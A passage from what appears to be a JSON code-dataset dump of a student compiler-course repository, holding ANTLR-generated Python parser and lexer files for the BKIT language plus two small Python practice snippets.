\"visitFunction_call\" ):\n return visitor.visitFunction_call(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_call(self):\n\n localctx = BKITParser.Function_callContext(self, self._ctx, self.state)\n self.enterRule(localctx, 80, self.RULE_function_call)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 411\n self.match(BKITParser.ID)\n self.state = 412\n self.match(BKITParser.LEFT_PAREN)\n self.state = 423\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 413\n self.expr()\n self.state = 418\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 414\n self.match(BKITParser.COMMA)\n self.state = 415\n self.expr()\n self.state = 420\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 425\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 426\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Index_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACKET(self):\n return self.getToken(BKITParser.LEFT_BRACKET, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_BRACKET(self):\n return self.getToken(BKITParser.RIGHT_BRACKET, 0)\n\n def index_op(self):\n return 
self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_index_op\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIndex_op\" ):\n return visitor.visitIndex_op(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def index_op(self):\n\n localctx = BKITParser.Index_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 82, self.RULE_index_op)\n try:\n self.state = 437\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,39,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 428\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 429\n self.expr()\n self.state = 430\n self.match(BKITParser.RIGHT_BRACKET)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 432\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 433\n self.expr()\n self.state = 434\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 435\n self.index_op()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[31] = self.expr1_sempred\n self._predicates[32] = self.expr2_sempred\n self._predicates[33] = self.expr3_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr3_sempred(self, localctx:Expr3Context, predIndex:int):\n if predIndex == 2:\n 
return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.3054637908935547, "alphanum_fraction": 0.5634900331497192, "avg_line_length": 56.85784149169922, "blob_id": "85bded2862d03d7ed1c6bfcb94b370a1ccea596d", "content_id": "a35bba8633281ffb7afc944e98c7bb0b934e6e19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11805, "license_type": "no_license", "max_line_length": 113, "num_lines": 204, "path": "/LexicalAnalysis/src/main/bkit/parser/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/LexicalAnalysis/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\22\")\n buf.write(\"\\u0110\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\6\\3S\\n\\3\\r\\3\\16\\3T\\3\\3\\6\\3\")\n buf.write(\"X\\n\\3\\r\\3\\16\\3Y\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\3\\5\\3\\5\\5\")\n buf.write(\"\\5e\\n\\5\\3\\6\\7\\6h\\n\\6\\f\\6\\16\\6k\\13\\6\\3\\7\\3\\7\\3\\b\\3\\b\\3\")\n buf.write(\"\\t\\3\\t\\3\\n\\5\\nt\\n\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\\f\\3\\r\\3\\r\\3\\r\")\n 
buf.write(\"\\5\\r~\\n\\r\\3\\16\\3\\16\\3\\16\\6\\16\\u0083\\n\\16\\r\\16\\16\\16\\u0084\")\n buf.write(\"\\3\\17\\3\\17\\7\\17\\u0089\\n\\17\\f\\17\\16\\17\\u008c\\13\\17\\3\\20\")\n buf.write(\"\\6\\20\\u008f\\n\\20\\r\\20\\16\\20\\u0090\\3\\20\\3\\20\\5\\20\\u0095\")\n buf.write(\"\\n\\20\\3\\20\\5\\20\\u0098\\n\\20\\3\\21\\3\\21\\3\\22\\3\\22\\3\\23\\3\")\n buf.write(\"\\23\\3\\24\\3\\24\\3\\25\\3\\25\\3\\26\\3\\26\\3\\27\\3\\27\\3\\30\\3\\30\")\n buf.write(\"\\3\\31\\3\\31\\3\\32\\3\\32\\3\\32\\3\\32\\5\\32\\u00b0\\n\\32\\3\\32\\6\")\n buf.write(\"\\32\\u00b3\\n\\32\\r\\32\\16\\32\\u00b4\\3\\33\\6\\33\\u00b8\\n\\33\\r\")\n buf.write(\"\\33\\16\\33\\u00b9\\3\\34\\3\\34\\3\\34\\3\\34\\5\\34\\u00c0\\n\\34\\3\")\n buf.write(\"\\34\\6\\34\\u00c3\\n\\34\\r\\34\\16\\34\\u00c4\\3\\35\\3\\35\\5\\35\\u00c9\")\n buf.write(\"\\n\\35\\3\\36\\3\\36\\5\\36\\u00cd\\n\\36\\3\\37\\3\\37\\3\\37\\3\\37\\5\")\n buf.write(\"\\37\\u00d3\\n\\37\\3 \\3 \\3 \\6 \\u00d8\\n \\r \\16 \\u00d9\\3!\\3\")\n buf.write(\"!\\7!\\u00de\\n!\\f!\\16!\\u00e1\\13!\\3!\\3!\\3\\\"\\6\\\"\\u00e6\\n\\\"\")\n buf.write(\"\\r\\\"\\16\\\"\\u00e7\\3\\\"\\3\\\"\\3#\\3#\\7#\\u00ee\\n#\\f#\\16#\\u00f1\")\n buf.write(\"\\13#\\3#\\5#\\u00f4\\n#\\3$\\3$\\3%\\3%\\3%\\3%\\7%\\u00fc\\n%\\f%\\16\")\n buf.write(\"%\\u00ff\\13%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\7&\\u010a\\n&\\f&\")\n buf.write(\"\\16&\\u010d\\13&\\3&\\3&\\4\\u00fd\\u010b\\2\\'\\3\\3\\5\\4\\7\\5\\t\\6\")\n buf.write(\"\\13\\7\\r\\2\\17\\2\\21\\2\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2\")\n buf.write(\"!\\2#\\2%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\2\\63\\b\\65\\t\\67\\n9\\13;\\2=\")\n buf.write(\"\\2?\\fA\\rC\\16E\\17G\\20I\\21K\\22\\3\\2\\24\\3\\2c|\\3\\2C\\\\\\3\\2\\62\")\n buf.write(\";\\4\\2--//\\3\\2\\\"\\\"\\t\\2))^^ddhhppttvv\\t\\2$$))ddhhppttvv\")\n buf.write(\"\\3\\2^^\\3\\2gg\\3\\2\\60\\60\\3\\2))\\3\\2$$\\4\\2$$))\\5\\2\\62;CHc\")\n buf.write(\"h\\3\\2\\629\\6\\2\\n\\f\\16\\17))^^\\5\\2\\13\\f\\17\\17\\\"\\\"\\5\\3\\n\\13\")\n 
buf.write(\"\\16\\17^^\\2\\u0117\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\")\n buf.write(\"\\t\\3\\2\\2\\2\\2\\13\\3\\2\\2\\2\\2\\63\\3\\2\\2\\2\\2\\65\\3\\2\\2\\2\\2\\67\")\n buf.write(\"\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2\")\n buf.write(\"E\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\3M\\3\\2\\2\\2\")\n buf.write(\"\\5R\\3\\2\\2\\2\\7]\\3\\2\\2\\2\\t`\\3\\2\\2\\2\\13i\\3\\2\\2\\2\\rl\\3\\2\\2\")\n buf.write(\"\\2\\17n\\3\\2\\2\\2\\21p\\3\\2\\2\\2\\23s\\3\\2\\2\\2\\25u\\3\\2\\2\\2\\27\")\n buf.write(\"w\\3\\2\\2\\2\\31}\\3\\2\\2\\2\\33\\177\\3\\2\\2\\2\\35\\u0086\\3\\2\\2\\2\")\n buf.write(\"\\37\\u008e\\3\\2\\2\\2!\\u0099\\3\\2\\2\\2#\\u009b\\3\\2\\2\\2%\\u009d\")\n buf.write(\"\\3\\2\\2\\2\\'\\u009f\\3\\2\\2\\2)\\u00a1\\3\\2\\2\\2+\\u00a3\\3\\2\\2\\2\")\n buf.write(\"-\\u00a5\\3\\2\\2\\2/\\u00a7\\3\\2\\2\\2\\61\\u00a9\\3\\2\\2\\2\\63\\u00af\")\n buf.write(\"\\3\\2\\2\\2\\65\\u00b7\\3\\2\\2\\2\\67\\u00bf\\3\\2\\2\\29\\u00c8\\3\\2\")\n buf.write(\"\\2\\2;\\u00cc\\3\\2\\2\\2=\\u00d2\\3\\2\\2\\2?\\u00d4\\3\\2\\2\\2A\\u00db\")\n buf.write(\"\\3\\2\\2\\2C\\u00e5\\3\\2\\2\\2E\\u00eb\\3\\2\\2\\2G\\u00f5\\3\\2\\2\\2\")\n buf.write(\"I\\u00f7\\3\\2\\2\\2K\\u0105\\3\\2\\2\\2MN\\7$\\2\\2N\\4\\3\\2\\2\\2OP\\7\")\n buf.write(\"X\\2\\2PQ\\7c\\2\\2QS\\7t\\2\\2RO\\3\\2\\2\\2ST\\3\\2\\2\\2TR\\3\\2\\2\\2\")\n buf.write(\"TU\\3\\2\\2\\2UW\\3\\2\\2\\2VX\\5? 
\\2WV\\3\\2\\2\\2XY\\3\\2\\2\\2YW\\3\\2\")\n buf.write(\"\\2\\2YZ\\3\\2\\2\\2Z[\\3\\2\\2\\2[\\\\\\7=\\2\\2\\\\\\6\\3\\2\\2\\2]^\\5\\23\")\n buf.write(\"\\n\\2^_\\5\\37\\20\\2_\\b\\3\\2\\2\\2`d\\5\\23\\n\\2ae\\5\\65\\33\\2be\\5\")\n buf.write(\"\\63\\32\\2ce\\5\\67\\34\\2da\\3\\2\\2\\2db\\3\\2\\2\\2dc\\3\\2\\2\\2e\\n\")\n buf.write(\"\\3\\2\\2\\2fh\\5;\\36\\2gf\\3\\2\\2\\2hk\\3\\2\\2\\2ig\\3\\2\\2\\2ij\\3\\2\")\n buf.write(\"\\2\\2j\\f\\3\\2\\2\\2ki\\3\\2\\2\\2lm\\t\\2\\2\\2m\\16\\3\\2\\2\\2no\\t\\3\")\n buf.write(\"\\2\\2o\\20\\3\\2\\2\\2pq\\t\\4\\2\\2q\\22\\3\\2\\2\\2rt\\t\\5\\2\\2sr\\3\\2\")\n buf.write(\"\\2\\2st\\3\\2\\2\\2t\\24\\3\\2\\2\\2uv\\t\\6\\2\\2v\\26\\3\\2\\2\\2wx\\7^\")\n buf.write(\"\\2\\2xy\\t\\7\\2\\2y\\30\\3\\2\\2\\2z{\\7^\\2\\2{~\\n\\b\\2\\2|~\\n\\t\\2\")\n buf.write(\"\\2}z\\3\\2\\2\\2}|\\3\\2\\2\\2~\\32\\3\\2\\2\\2\\177\\u0080\\t\\n\\2\\2\\u0080\")\n buf.write(\"\\u0082\\5\\23\\n\\2\\u0081\\u0083\\5\\21\\t\\2\\u0082\\u0081\\3\\2\\2\")\n buf.write(\"\\2\\u0083\\u0084\\3\\2\\2\\2\\u0084\\u0082\\3\\2\\2\\2\\u0084\\u0085\")\n buf.write(\"\\3\\2\\2\\2\\u0085\\34\\3\\2\\2\\2\\u0086\\u008a\\t\\13\\2\\2\\u0087\\u0089\")\n buf.write(\"\\5\\21\\t\\2\\u0088\\u0087\\3\\2\\2\\2\\u0089\\u008c\\3\\2\\2\\2\\u008a\")\n buf.write(\"\\u0088\\3\\2\\2\\2\\u008a\\u008b\\3\\2\\2\\2\\u008b\\36\\3\\2\\2\\2\\u008c\")\n buf.write(\"\\u008a\\3\\2\\2\\2\\u008d\\u008f\\5\\21\\t\\2\\u008e\\u008d\\3\\2\\2\")\n buf.write(\"\\2\\u008f\\u0090\\3\\2\\2\\2\\u0090\\u008e\\3\\2\\2\\2\\u0090\\u0091\")\n buf.write(\"\\3\\2\\2\\2\\u0091\\u0097\\3\\2\\2\\2\\u0092\\u0094\\5\\35\\17\\2\\u0093\")\n buf.write(\"\\u0095\\5\\33\\16\\2\\u0094\\u0093\\3\\2\\2\\2\\u0094\\u0095\\3\\2\\2\")\n buf.write(\"\\2\\u0095\\u0098\\3\\2\\2\\2\\u0096\\u0098\\5\\33\\16\\2\\u0097\\u0092\")\n buf.write(\"\\3\\2\\2\\2\\u0097\\u0096\\3\\2\\2\\2\\u0098 \\3\\2\\2\\2\\u0099\\u009a\")\n buf.write(\"\\t\\f\\2\\2\\u009a\\\"\\3\\2\\2\\2\\u009b\\u009c\\t\\r\\2\\2\\u009c$\\3\")\n 
buf.write(\"\\2\\2\\2\\u009d\\u009e\\t\\16\\2\\2\\u009e&\\3\\2\\2\\2\\u009f\\u00a0\")\n buf.write(\"\\t\\17\\2\\2\\u00a0(\\3\\2\\2\\2\\u00a1\\u00a2\\t\\20\\2\\2\\u00a2*\\3\")\n buf.write(\"\\2\\2\\2\\u00a3\\u00a4\\7<\\2\\2\\u00a4,\\3\\2\\2\\2\\u00a5\\u00a6\\7\")\n buf.write(\"=\\2\\2\\u00a6.\\3\\2\\2\\2\\u00a7\\u00a8\\7\\60\\2\\2\\u00a8\\60\\3\\2\")\n buf.write(\"\\2\\2\\u00a9\\u00aa\\7.\\2\\2\\u00aa\\62\\3\\2\\2\\2\\u00ab\\u00ac\\7\")\n buf.write(\"\\62\\2\\2\\u00ac\\u00b0\\7z\\2\\2\\u00ad\\u00ae\\7\\62\\2\\2\\u00ae\")\n buf.write(\"\\u00b0\\7Z\\2\\2\\u00af\\u00ab\\3\\2\\2\\2\\u00af\\u00ad\\3\\2\\2\\2\")\n buf.write(\"\\u00b0\\u00b2\\3\\2\\2\\2\\u00b1\\u00b3\\5\\'\\24\\2\\u00b2\\u00b1\")\n buf.write(\"\\3\\2\\2\\2\\u00b3\\u00b4\\3\\2\\2\\2\\u00b4\\u00b2\\3\\2\\2\\2\\u00b4\")\n buf.write(\"\\u00b5\\3\\2\\2\\2\\u00b5\\64\\3\\2\\2\\2\\u00b6\\u00b8\\5\\21\\t\\2\\u00b7\")\n buf.write(\"\\u00b6\\3\\2\\2\\2\\u00b8\\u00b9\\3\\2\\2\\2\\u00b9\\u00b7\\3\\2\\2\\2\")\n buf.write(\"\\u00b9\\u00ba\\3\\2\\2\\2\\u00ba\\66\\3\\2\\2\\2\\u00bb\\u00bc\\7\\62\")\n buf.write(\"\\2\\2\\u00bc\\u00c0\\7q\\2\\2\\u00bd\\u00be\\7\\62\\2\\2\\u00be\\u00c0\")\n buf.write(\"\\7Q\\2\\2\\u00bf\\u00bb\\3\\2\\2\\2\\u00bf\\u00bd\\3\\2\\2\\2\\u00c0\")\n buf.write(\"\\u00c2\\3\\2\\2\\2\\u00c1\\u00c3\\5)\\25\\2\\u00c2\\u00c1\\3\\2\\2\\2\")\n buf.write(\"\\u00c3\\u00c4\\3\\2\\2\\2\\u00c4\\u00c2\\3\\2\\2\\2\\u00c4\\u00c5\\3\")\n buf.write(\"\\2\\2\\2\\u00c58\\3\\2\\2\\2\\u00c6\\u00c9\\5\\r\\7\\2\\u00c7\\u00c9\")\n buf.write(\"\\5\\17\\b\\2\\u00c8\\u00c6\\3\\2\\2\\2\\u00c8\\u00c7\\3\\2\\2\\2\\u00c9\")\n buf.write(\":\\3\\2\\2\\2\\u00ca\\u00cd\\n\\21\\2\\2\\u00cb\\u00cd\\5\\27\\f\\2\\u00cc\")\n buf.write(\"\\u00ca\\3\\2\\2\\2\\u00cc\\u00cb\\3\\2\\2\\2\\u00cd<\\3\\2\\2\\2\\u00ce\")\n buf.write(\"\\u00d3\\5+\\26\\2\\u00cf\\u00d3\\5-\\27\\2\\u00d0\\u00d3\\5/\\30\\2\")\n buf.write(\"\\u00d1\\u00d3\\5\\61\\31\\2\\u00d2\\u00ce\\3\\2\\2\\2\\u00d2\\u00cf\")\n 
buf.write(\"\\3\\2\\2\\2\\u00d2\\u00d0\\3\\2\\2\\2\\u00d2\\u00d1\\3\\2\\2\\2\\u00d3\")\n buf.write(\">\\3\\2\\2\\2\\u00d4\\u00d7\\5\\r\\7\\2\\u00d5\\u00d8\\5\\r\\7\\2\\u00d6\")\n buf.write(\"\\u00d8\\5\\21\\t\\2\\u00d7\\u00d5\\3\\2\\2\\2\\u00d7\\u00d6\\3\\2\\2\")\n buf.write(\"\\2\\u00d8\\u00d9\\3\\2\\2\\2\\u00d9\\u00d7\\3\\2\\2\\2\\u00d9\\u00da\")\n buf.write(\"\\3\\2\\2\\2\\u00da@\\3\\2\\2\\2\\u00db\\u00df\\7$\\2\\2\\u00dc\\u00de\")\n buf.write(\"\\5;\\36\\2\\u00dd\\u00dc\\3\\2\\2\\2\\u00de\\u00e1\\3\\2\\2\\2\\u00df\")\n buf.write(\"\\u00dd\\3\\2\\2\\2\\u00df\\u00e0\\3\\2\\2\\2\\u00e0\\u00e2\\3\\2\\2\\2\")\n buf.write(\"\\u00e1\\u00df\\3\\2\\2\\2\\u00e2\\u00e3\\5\\31\\r\\2\\u00e3B\\3\\2\\2\")\n buf.write(\"\\2\\u00e4\\u00e6\\t\\22\\2\\2\\u00e5\\u00e4\\3\\2\\2\\2\\u00e6\\u00e7\")\n buf.write(\"\\3\\2\\2\\2\\u00e7\\u00e5\\3\\2\\2\\2\\u00e7\\u00e8\\3\\2\\2\\2\\u00e8\")\n buf.write(\"\\u00e9\\3\\2\\2\\2\\u00e9\\u00ea\\b\\\"\\2\\2\\u00eaD\\3\\2\\2\\2\\u00eb\")\n buf.write(\"\\u00ef\\7$\\2\\2\\u00ec\\u00ee\\5;\\36\\2\\u00ed\\u00ec\\3\\2\\2\\2\")\n buf.write(\"\\u00ee\\u00f1\\3\\2\\2\\2\\u00ef\\u00ed\\3\\2\\2\\2\\u00ef\\u00f0\\3\")\n buf.write(\"\\2\\2\\2\\u00f0\\u00f3\\3\\2\\2\\2\\u00f1\\u00ef\\3\\2\\2\\2\\u00f2\\u00f4\")\n buf.write(\"\\t\\23\\2\\2\\u00f3\\u00f2\\3\\2\\2\\2\\u00f4F\\3\\2\\2\\2\\u00f5\\u00f6\")\n buf.write(\"\\13\\2\\2\\2\\u00f6H\\3\\2\\2\\2\\u00f7\\u00f8\\7,\\2\\2\\u00f8\\u00f9\")\n buf.write(\"\\7,\\2\\2\\u00f9\\u00fd\\3\\2\\2\\2\\u00fa\\u00fc\\13\\2\\2\\2\\u00fb\")\n buf.write(\"\\u00fa\\3\\2\\2\\2\\u00fc\\u00ff\\3\\2\\2\\2\\u00fd\\u00fe\\3\\2\\2\\2\")\n buf.write(\"\\u00fd\\u00fb\\3\\2\\2\\2\\u00fe\\u0100\\3\\2\\2\\2\\u00ff\\u00fd\\3\")\n buf.write(\"\\2\\2\\2\\u0100\\u0101\\7,\\2\\2\\u0101\\u0102\\7,\\2\\2\\u0102\\u0103\")\n buf.write(\"\\3\\2\\2\\2\\u0103\\u0104\\b%\\3\\2\\u0104J\\3\\2\\2\\2\\u0105\\u0106\")\n buf.write(\"\\7,\\2\\2\\u0106\\u0107\\7,\\2\\2\\u0107\\u010b\\3\\2\\2\\2\\u0108\\u010a\")\n 
buf.write(\"\\13\\2\\2\\2\\u0109\\u0108\\3\\2\\2\\2\\u010a\\u010d\\3\\2\\2\\2\\u010b\")\n buf.write(\"\\u010c\\3\\2\\2\\2\\u010b\\u0109\\3\\2\\2\\2\\u010c\\u010e\\3\\2\\2\\2\")\n buf.write(\"\\u010d\\u010b\\3\\2\\2\\2\\u010e\\u010f\\7\\2\\2\\3\\u010fL\\3\\2\\2\")\n buf.write(\"\\2\\36\\2TYdis}\\u0084\\u008a\\u0090\\u0094\\u0097\\u00af\\u00b4\")\n buf.write(\"\\u00b9\\u00bf\\u00c4\\u00c8\\u00cc\\u00d2\\u00d7\\u00d9\\u00df\")\n buf.write(\"\\u00e7\\u00ef\\u00f3\\u00fd\\u010b\\4\\b\\2\\2\\2\\3\\2\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n T__0 = 1\n VAR = 2\n Real_number = 3\n Integer_number = 4\n String = 5\n HEXADECIMAL = 6\n DECIMAL = 7\n OCTAL = 8\n LETTER = 9\n ID = 10\n ILLEGAL_ESCAPE = 11\n WS = 12\n UNCLOSE_STRING = 13\n ERROR_CHAR = 14\n BLOCK_COMMENT = 15\n UNTERMINATED_COMMENT = 16\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'\\\"'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"VAR\", \"Real_number\", \"Integer_number\", \"String\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"LETTER\", \"ID\", \"ILLEGAL_ESCAPE\", \"WS\", \n \"UNCLOSE_STRING\", \"ERROR_CHAR\", \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n ruleNames = [ \"T__0\", \"VAR\", \"Real_number\", \"Integer_number\", \"String\", \n \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"SIGN\", \n \"SPACE\", \"ESCAPE_SEQUENCE\", \"ILLEGEL_ESC\", \"SCIENTIFIC\", \n \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \"SING_QUOTE\", \"DOUBLE_QUOTE\", \n \"DOUBLE_QUOTE_IN_QUOTE\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \n \"COLON\", \"SEMI\", \"DOT\", \"COMMA\", \"HEXADECIMAL\", \"DECIMAL\", \n \"OCTAL\", \"LETTER\", \"STRING_CHAR\", \"PUNCTUATION\", \"ID\", \n \"ILLEGAL_ESCAPE\", \"WS\", \"UNCLOSE_STRING\", \"ERROR_CHAR\", \n \"BLOCK_COMMENT\", 
\"UNTERMINATED_COMMENT\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n" }, { "alpha_fraction": 0.4555555582046509, "alphanum_fraction": 0.47777777910232544, "avg_line_length": 10.375, "blob_id": "7ebe786c311e18b98ce99dfb0249cf6bfb8e32ca", "content_id": "5861c01cee63cc6835cc25b350f2bc5ef5a8981a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 90, "license_type": "no_license", "max_line_length": 20, "num_lines": 8, "path": "/Assignments/assignment2/src1.0/test.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class A:\n a:int\n b:int\n def print(self):\n print(a,b)\n\na = A(1,2)\na.print()" }, { "alpha_fraction": 0.5588235259056091, "alphanum_fraction": 0.5784313678741455, "avg_line_length": 13.714285850524902, "blob_id": "7ecb7c8b3befdd9009f76f7282dcd84005b0348b", "content_id": "b987751d9994833ec8da80586ede5a7a4b3eab40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 19, "num_lines": 7, "path": "/FP/ProgCode.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "def powGen(x):\n def pow(y):\n return x**y\n return pow\n\nsquare = powGen(2)\nprint(square(3))" }, { "alpha_fraction": 0.29898977279663086, "alphanum_fraction": 0.565826952457428, 
"avg_line_length": 58.804264068603516, "blob_id": "2e3b103d52ce703884b94a22ffc6361d505891eb", "content_id": "8d5cac56bc95cc7c38a29c8e26f9e0c9fb446986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30884, "license_type": "no_license", "max_line_length": 121, "num_lines": 516, "path": "/Assignments/assignment3/src/main/bkit/parser/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/Assignments/assignment3/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2M\")\n buf.write(\"\\u02bd\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n 